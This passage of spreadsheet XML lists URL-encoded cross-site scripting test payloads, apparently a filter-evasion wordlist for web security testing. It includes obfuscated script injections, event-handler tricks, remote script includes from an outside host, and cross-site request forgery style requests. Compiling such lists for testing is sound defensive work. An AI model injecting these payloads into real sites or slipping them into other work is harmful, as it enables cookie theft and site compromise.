        <v>%3Ca%20onmouseover%3D%22alert%28document.cookie%29%22%3Exxs%20link%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1834">
      <c r="A1834" s="3" t="s">
        <v>470</v>
      </c>
      <c r="B1834" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20onmouseover%3Dalert%28document.cookie%29%3Exxs%20link%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1835">
      <c r="A1835" s="3" t="s">
        <v>471</v>
      </c>
      <c r="B1835" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="1836">
      <c r="A1836" s="3" t="s">
        <v>472</v>
      </c>
      <c r="B1836" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E</v>
      </c>
    </row>
    <row r="1837">
      <c r="A1837" s="3" t="s">
        <v>473</v>
      </c>
      <c r="B1837" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%23%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E</v>
      </c>
    </row>
    <row r="1838">
      <c r="A1838" s="3" t="s">
        <v>474</v>
      </c>
      <c r="B1838" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E</v>
      </c>
    </row>
    <row r="1839">
      <c r="A1839" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B1839" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E</v>
      </c>
    </row>
    <row r="1840">
      <c r="A1840" s="3" t="s">
        <v>476</v>
      </c>
      <c r="B1840" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E</v>
      </c>
    </row>
    <row r="1841">
      <c r="A1841" s="3" t="s">
        <v>477</v>
      </c>
      <c r="B1841" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E</v>
      </c>
    </row>
    <row r="1842">
      <c r="A1842" s="3" t="s">
        <v>478</v>
      </c>
      <c r="B1842" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E</v>
      </c>
    </row>
    <row r="1843">
      <c r="A1843" s="3" t="s">
        <v>1053</v>
      </c>
      <c r="B1843" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%20ascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1844">
      <c r="A1844" s="3" t="s">
        <v>480</v>
      </c>
      <c r="B1844" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1845">
      <c r="A1845" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B1845" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1846">
      <c r="A1846" s="3" t="s">
        <v>482</v>
      </c>
      <c r="B1846" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1847">
      <c r="A1847" s="3" t="s">
        <v>483</v>
      </c>
      <c r="B1847" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%27print%20%22%3CIMG%20SRC%3Djava%5C0script%3Aalert%28%5C%22XSS%5C%22%29%3E%22%3B%27%20%3E%20out</v>
      </c>
    </row>
    <row r="1848">
      <c r="A1848" s="3" t="s">
        <v>484</v>
      </c>
      <c r="B1848" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22%20%26%2314%3B%20%20javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1849">
      <c r="A1849" s="3" t="s">
        <v>485</v>
      </c>
      <c r="B1849" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FXSS%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1850">
      <c r="A1850" s="3" t="s">
        <v>486</v>
      </c>
      <c r="B1850" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E</v>
      </c>
    </row>
    <row r="1851">
      <c r="A1851" s="3" t="s">
        <v>487</v>
      </c>
      <c r="B1851" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FSRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1852">
      <c r="A1852" s="3" t="s">
        <v>488</v>
      </c>
      <c r="B1852" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1853">
      <c r="A1853" s="3" t="s">
        <v>489</v>
      </c>
      <c r="B1853" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F%3C%20B%20%3E</v>
      </c>
    </row>
    <row r="1854">
      <c r="A1854" s="3" t="s">
        <v>490</v>
      </c>
      <c r="B1854" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%2F%2Fha.ckers.org%2F.j%3E</v>
      </c>
    </row>
    <row r="1855">
      <c r="A1855" s="3" t="s">
        <v>491</v>
      </c>
      <c r="B1855" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22</v>
      </c>
    </row>
    <row r="1856">
      <c r="A1856" s="3" t="s">
        <v>492</v>
      </c>
      <c r="B1856" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%20%3C</v>
      </c>
    </row>
    <row r="1857">
      <c r="A1857" s="3" t="s">
        <v>493</v>
      </c>
      <c r="B1857" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%22%3Balert%28%27XSS%27%29%3B%2F%2F</v>
      </c>
    </row>
    <row r="1858">
      <c r="A1858" s="3" t="s">
        <v>494</v>
      </c>
      <c r="B1858" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1859">
      <c r="A1859" s="3" t="s">
        <v>495</v>
      </c>
      <c r="B1859" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1860">
      <c r="A1860" s="3" t="s">
        <v>496</v>
      </c>
      <c r="B1860" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1861">
      <c r="A1861" s="3" t="s">
        <v>497</v>
      </c>
      <c r="B1861" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1862">
      <c r="A1862" s="3" t="s">
        <v>498</v>
      </c>
      <c r="B1862" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20LOWSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1863">
      <c r="A1863" s="3" t="s">
        <v>499</v>
      </c>
      <c r="B1863" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3Eli%20%7Blist-style-image%3A%20url%28%22javascript%3Aalert%28%27XSS%27%29%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS%3C%2Fbr%3E</v>
      </c>
    </row>
    <row r="1864">
      <c r="A1864" s="3" t="s">
        <v>500</v>
      </c>
      <c r="B1864" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E</v>
      </c>
    </row>
    <row r="1865">
      <c r="A1865" s="3" t="s">
        <v>501</v>
      </c>
      <c r="B1865" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22livescript%3A%5Bcode%5D%22%3E</v>
      </c>
    </row>
    <row r="1866">
      <c r="A1866" s="3" t="s">
        <v>502</v>
      </c>
      <c r="B1866" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Dalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="1867">
      <c r="A1867" s="3" t="s">
        <v>503</v>
      </c>
      <c r="B1867" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBGSOUND%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1868">
      <c r="A1868" s="3" t="s">
        <v>504</v>
      </c>
      <c r="B1868" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBR%20SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E</v>
      </c>
    </row>
    <row r="1869">
      <c r="A1869" s="3" t="s">
        <v>505</v>
      </c>
      <c r="B1869" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1870">
      <c r="A1870" s="3" t="s">
        <v>506</v>
      </c>
      <c r="B1870" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E</v>
      </c>
    </row>
    <row r="1871">
      <c r="A1871" s="3" t="s">
        <v>507</v>
      </c>
      <c r="B1871" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1872">
      <c r="A1872" s="3" t="s">
        <v>508</v>
      </c>
      <c r="B1872" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22Link%22%20Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B%20REL%3Dstylesheet%22%3E</v>
      </c>
    </row>
    <row r="1873">
      <c r="A1873" s="3" t="s">
        <v>509</v>
      </c>
      <c r="B1873" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1874">
      <c r="A1874" s="3" t="s">
        <v>510</v>
      </c>
      <c r="B1874" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Aalert%28%22XSS%22%29%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1875">
      <c r="A1875" s="3" t="s">
        <v>511</v>
      </c>
      <c r="B1875" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20STYLE%3D%22xss%3Aexpr%2F%2AXSS%2A%2Fession%28alert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1876">
      <c r="A1876" s="3" t="s">
        <v>512</v>
      </c>
      <c r="B1876" s="4" t="str">
        <f t="shared" si="1"/>
        <v>exp%2F%2A%3CA%20STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3Bxss%3Aex%2F%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E</v>
      </c>
    </row>
    <row r="1877">
      <c r="A1877" s="3" t="s">
        <v>513</v>
      </c>
      <c r="B1877" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20TYPE%3D%22text%2Fjavascript%22%3Ealert%28%27XSS%27%29%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1878">
      <c r="A1878" s="3" t="s">
        <v>514</v>
      </c>
      <c r="B1878" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E.XSS%7Bbackground-image%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%3B%7D%3C%2FSTYLE%3E%3CA%20CLASS%3DXSS%3E%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1879">
      <c r="A1879" s="3" t="s">
        <v>515</v>
      </c>
      <c r="B1879" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1880">
      <c r="A1880" s="3" t="s">
        <v>515</v>
      </c>
      <c r="B1880" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1881">
      <c r="A1881" s="3" t="s">
        <v>516</v>
      </c>
      <c r="B1881" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1882">
      <c r="A1882" s="3" t="s">
        <v>517</v>
      </c>
      <c r="B1882" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22behavior%3A%20url%28xss.htc%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1883">
      <c r="A1883" s="3" t="s">
        <v>518</v>
      </c>
      <c r="B1883" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%C2%BCscript%C2%BEalert%28%C2%A2XSS%C2%A2%29%C2%BC%2Fscript%C2%BE</v>
      </c>
    </row>
    <row r="1884">
      <c r="A1884" s="3" t="s">
        <v>519</v>
      </c>
      <c r="B1884" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1885">
      <c r="A1885" s="3" t="s">
        <v>520</v>
      </c>
      <c r="B1885" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%20base64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E</v>
      </c>
    </row>
    <row r="1886">
      <c r="A1886" s="3" t="s">
        <v>521</v>
      </c>
      <c r="B1886" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1887">
      <c r="A1887" s="3" t="s">
        <v>522</v>
      </c>
      <c r="B1887" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1888">
      <c r="A1888" s="3" t="s">
        <v>523</v>
      </c>
      <c r="B1888" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert%28document.cookie%29%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1889">
      <c r="A1889" s="3" t="s">
        <v>524</v>
      </c>
      <c r="B1889" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FFRAMESET%3E</v>
      </c>
    </row>
    <row r="1890">
      <c r="A1890" s="3" t="s">
        <v>525</v>
      </c>
      <c r="B1890" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1891">
      <c r="A1891" s="3" t="s">
        <v>526</v>
      </c>
      <c r="B1891" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%3E%3CTD%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1892">
      <c r="A1892" s="3" t="s">
        <v>527</v>
      </c>
      <c r="B1892" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1893">
      <c r="A1893" s="3" t="s">
        <v>528</v>
      </c>
      <c r="B1893" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%5C0075%5C0072%5C006C%5C0028%27%5C006a%5C0061%5C0076%5C0061%5C0073%5C0063%5C0072%5C0069%5C0070%5C0074%5C003a%5C0061%5C006c%5C0065%5C0072%5C0074%5C0028.1027%5C0058.1053%5C0053%5C0027%5C0029%27%5C0029%22%3E</v>
      </c>
    </row>
    <row r="1894">
      <c r="A1894" s="3" t="s">
        <v>529</v>
      </c>
      <c r="B1894" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28%26%231%3Bjavascript%3Aalert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1895">
      <c r="A1895" s="3" t="s">
        <v>530</v>
      </c>
      <c r="B1895" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22width%3A%20expression%28alert%28%27XSS%27%29%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1896">
      <c r="A1896" s="3" t="s">
        <v>531</v>
      </c>
      <c r="B1896" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBASE%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="1897">
      <c r="A1897" s="3" t="s">
        <v>532</v>
      </c>
      <c r="B1897" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20TYPE%3D%22text%2Fx-scriptlet%22%20DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E</v>
      </c>
    </row>
    <row r="1898">
      <c r="A1898" s="3" t="s">
        <v>533</v>
      </c>
      <c r="B1898" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CEMBED%20SRC%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH%20A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv%20MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs%20aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw%20IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh%20TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22%20type%3D%22image%2Fsvg%2Bxml%22%20AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E</v>
      </c>
    </row>
    <row r="1899">
      <c r="A1899" s="3" t="s">
        <v>534</v>
      </c>
      <c r="B1899" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1900">
      <c r="A1900" s="3" t="s">
        <v>535</v>
      </c>
      <c r="B1900" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27%3CSCR%27%22--%3E%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27IPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E</v>
      </c>
    </row>
    <row r="1901">
      <c r="A1901" s="3" t="s">
        <v>536</v>
      </c>
      <c r="B1901" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20echo%28%27%3CSCR%29%27%3Becho%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B%20%3F%3E</v>
      </c>
    </row>
    <row r="1902">
      <c r="A1902" s="3" t="s">
        <v>537</v>
      </c>
      <c r="B1902" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E</v>
      </c>
    </row>
    <row r="1903">
      <c r="A1903" s="3" t="s">
        <v>538</v>
      </c>
      <c r="B1903" s="4" t="str">
        <f t="shared" si="1"/>
        <v>Redirect%20302%20%2Fa.jpg%20http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser</v>
      </c>
    </row>
    <row r="1904">
      <c r="A1904" s="3" t="s">
        <v>539</v>
      </c>
      <c r="B1904" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22Set-Cookie%22%20Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="1905">
      <c r="A1905" s="3" t="s">
        <v>540</v>
      </c>
      <c r="B1905" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHEAD%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT%3D%22text%2Fhtml%3B%20charset%3DUTF-7%22%3E%20%3C%2FHEAD%3E%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="1906">
      <c r="A1906" s="3" t="s">
        <v>541</v>
      </c>
      <c r="B1906" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1907">
      <c r="A1907" s="3" t="s">
        <v>542</v>
      </c>
      <c r="B1907" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1908">
      <c r="A1908" s="3" t="s">
        <v>543</v>
      </c>
      <c r="B1908" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%22%20%27%27%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1909">
      <c r="A1909" s="3" t="s">
        <v>544</v>
      </c>
      <c r="B1909" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20%22a%3D%27%3E%27%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1910">
      <c r="A1910" s="3" t="s">
        <v>545</v>
      </c>
      <c r="B1910" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%60%3E%60%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1911">
      <c r="A1911" s="3" t="s">
        <v>546</v>
      </c>
      <c r="B1911" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%27%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1912">
      <c r="A1912" s="3" t="s">
        <v>547</v>
      </c>
      <c r="B1912" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1913">
      <c r="A1913" s="3" t="s">
        <v>548</v>
      </c>
      <c r="B1913" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1914">
      <c r="A1914" s="3" t="s">
        <v>549</v>
      </c>
      <c r="B1914" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1915">
      <c r="A1915" s="3" t="s">
        <v>550</v>
      </c>
      <c r="B1915" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1916">
      <c r="A1916" s="3" t="s">
        <v>551</v>
      </c>
      <c r="B1916" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1917">
      <c r="A1917" s="3" t="s">
        <v>552</v>
      </c>
      <c r="B1917" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1918">
      <c r="A1918" s="3" t="s">
        <v>1054</v>
      </c>
      <c r="B1918" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22htt%20p%3A%2F%2F6%206.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1919">
      <c r="A1919" s="3" t="s">
        <v>1034</v>
      </c>
      <c r="B1919" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20%20src%3D%22%26Tab%3Bjavascript%3Aprompt%281%29%26Tab%3B%22%3E</v>
      </c>
    </row>
    <row r="1920">
      <c r="A1920" s="3" t="s">
        <v>555</v>
      </c>
      <c r="B1920" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cstyle%3E%7Bfont-family%26colon%3B%27%3Ciframe%2Fonload%3Dconfirm%281%29%3E%27</v>
      </c>
    </row>
    <row r="1921">
      <c r="A1921" s="3" t="s">
        <v>556</v>
      </c>
      <c r="B1921" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%2Fonmouseover%3D%22javaSCRIPT%26colon%3Bconfirm%26lpar%3B1%26rpar%3B%22</v>
      </c>
    </row>
    <row r="1922">
      <c r="A1922" s="3" t="s">
        <v>1035</v>
      </c>
      <c r="B1922" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CsVg%3E%3CscRipt%20%3Ealert%26lpar%3B1%26rpar%3B%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="1923">
      <c r="A1923" s="3" t="s">
        <v>1036</v>
